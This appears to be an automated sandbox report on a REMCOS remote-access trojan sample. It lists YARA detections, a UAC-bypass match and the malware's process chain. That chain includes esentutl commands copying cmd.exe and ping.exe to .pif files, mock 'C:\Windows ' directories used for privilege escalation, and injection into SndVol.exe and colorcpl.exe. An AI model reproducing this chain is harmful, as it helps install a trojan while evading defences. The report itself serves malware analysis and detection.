Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@34/10@4/4
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02936AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 6_2_02936AB7
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 19_2_02956AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 19_2_02956AB7
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D37FD2 GetDiskFreeSpaceA, 0_2_02D37FD2
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0292E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 6_2_0292E219
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Code function: 0_2_02D46DC8 CoCreateInstance, 0_2_02D46DC8
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_0293A63F FindResourceA,LoadResource,LockResource,SizeofResource, 6_2_0293A63F
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 6_2_02939BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 6_2_02939BC4
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\SysWOW64\SndVol.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: jW3NEKvxH1.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe File read: C:\Users\user\Desktop\jW3NEKvxH1.exe
Source: unknown Process created: C:\Users\user\Desktop\jW3NEKvxH1.exe "C:\Users\user\Desktop\jW3NEKvxH1.exe"
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown Process created: C:\Users\Public\Libraries\Dlaybpxl.PIF "C:\Users\Public\Libraries\Dlaybpxl.PIF"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: unknown Process created: C:\Users\Public\Libraries\Dlaybpxl.PIF "C:\Users\Public\Libraries\Dlaybpxl.PIF"
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??????p??.dll
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\jW3NEKvxH1.exe Section loaded: ??.dll Jump to behavior
